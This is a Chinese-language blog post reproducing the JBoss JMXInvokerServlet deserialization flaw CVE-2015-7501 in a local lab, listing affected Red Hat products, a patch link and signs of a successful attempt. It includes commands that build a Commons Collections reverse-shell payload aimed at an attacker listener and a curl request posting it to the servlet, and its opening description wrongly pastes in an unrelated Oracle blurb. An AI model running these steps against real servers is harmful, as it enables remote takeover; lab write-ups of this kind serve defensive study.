JBoss JMXInvokerServlet 反序列化漏洞 CVE-2015-7501 已亲自复现

Bolgzhang2023-12-23 22:56

JBoss JMXInvokerServlet 反序列化漏洞 CVE-2015-7501 已亲自复现

漏洞名称

漏洞描述

在Oracle Rapid Planning 12.1/12.2.2中发现了一个被归类为"严重"的漏洞。受到影响的是一些未知的组件处理中间层。升级可消除此漏洞。在泄露漏洞后立即发布了可能的缓解措施。

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

影响版本

Redhat Jboss_Operations_Network 3.0

Redhat Jboss_Enterprise_Brms_Platform 5.0.0

Redhat Jboss_Enterprise_Application_Platform 4.3.0

Redhat Jboss_Enterprise_Application_Platform 5.0.0

Redhat Jboss_Data_Virtualization 5.0.0

Redhat Jboss_Enterprise_Application_Platform 6.0.0

Redhat Xpaas 3.0.0

Redhat Jboss_Enterprise_Soa_Platform 5.0.0

Redhat Jboss_Fuse_Service_Works 6.0

Redhat Subscription_Asset_Manager 1.3.0

Redhat Jboss_Bpm_Suite 6.0.0

Redhat Data_Grid 6.0.0

Redhat Jboss_A-Mq 6.0.0

Redhat Jboss_Fuse 6.0.0

Redhat Jboss_Portal 6.0.0

Redhat Jboss_Data_Virtualization 6.0.0

Redhat Openshift 3.0

Redhat Jboss_Enterprise_Brms_Platform 6.0.0

Redhat Jboss_Enterprise_Web_Server 3.0.0

漏洞复现

环境搭建

受害者IP:192.168.63.129:65336

攻击者IP:192.168.63.1

vulfocus下载链接

bash 复制代码 
https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git

启动vulfocus

bash 复制代码 
docker-compose up -d

环境启动后,访问http://192.168.63.129:65336即可看到一个Jboss页面,说明已成功启动。

访问路径/invoker/JMXInvokerServlet,若提示JMXInvokerServlet文件下载则说明可能存在漏洞;

漏洞利用

通过借助ysoserial的eCommonsCollections5利用链来复现。生成Payload,生成编译后的Java文件

ReverseShellCommonsCollectionsHashMap.class,生成ReverseShellCommonsCollectionsHashMap.ser文件,进行反弹shell。

bash 复制代码 
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 192.168.63.1:7777
bash 复制代码 
curl http://192.168.63.129:65336/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

使用burp看看响应体会返回什么,抓取原始请求的响应。

由于在处理/invoker/JMXInvokerServlet请求的时候会读取用户传入的对象,那我们可以构造恶意的数据传入,当jboss处理该数据时即可执行该恶意数据,从而达到执行任意代码的效果;

将生成的ReverseShellCommonsCollectionsHashMap.ser下载到本地,burp抓包后修改为post提交方式,接着右击paste from file上传生成的ReverseShellCommonsCollectionsHashMap.ser文件;(注:攻击机要先开启监听)

修复建议

Red Hat JBoss Portal任意代码执行漏洞(CVE-2015-7501)的补丁--- 登录红帽门户安装对应修复版本

补丁链接:https://access.redhat.com/security/vulnerabilities/2059393

总结

如果payload请求成功,在响应头中返回的状态码为200,在响应体中抛出 org.jboss.invocation.InvocationException异常信息,则需要结合网络日志和流量日志进行分析。如果返回其他状态码,则攻击失败。

相关推荐
菜根Sec1 小时前
网络安全冬天怎么过
安全·web安全·网络安全·网络安全公司
CDN36019 小时前
360CDN SDK 游戏盾:轻量化接入 + 强防护实测
运维·游戏·网络安全
hzhsec20 小时前
MSF-CobaltStrike实现内网socks代理转发上线
服务器·网络·安全·网络安全
CDN3601 天前
低成本游戏防护:360 SDK 游戏盾使用总结
运维·游戏·网络安全
Chockmans1 天前
春秋云境CVE-2021-46436
web安全·网络安全·春秋云境·cve-2021-46436
xixixi777771 天前
5G核心网核心之辨:从服务化架构(SBA)到网络切片的深度实践解析
人工智能·网络安全·信息与通信·通信
IpdataCloud1 天前
网络安防实战:如何用IP查询工具精准定位风险IP?
网络·经验分享·tcp/ip·网络安全
XuanTao771 天前
【分享】✍️手写生成器|高级版|轻松生成自然逼真手写字体
数码相机·计算机网络·网络安全·智能手机·软件工程
xixixi777771 天前
从SQL注入到XSS:实战Web安全渗透测试
人工智能·安全·web安全·网络安全·卫星通信
CDN3601 天前
爬虫对抗:ZLibrary反爬机制实战分析及360CDN解决方案可行性论证
爬虫·网络安全
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03围棋-html版本04小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)05班级宠物园部署指南06OpenClaw 使用和管理 MCP 完全指南07OpenClaw Control UI安全上下文访问配置08AI 编程三剑客:Spec-Kit、OpenSpec、Superpowers 深度对比与实战指南09UV安装并设置国内源10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)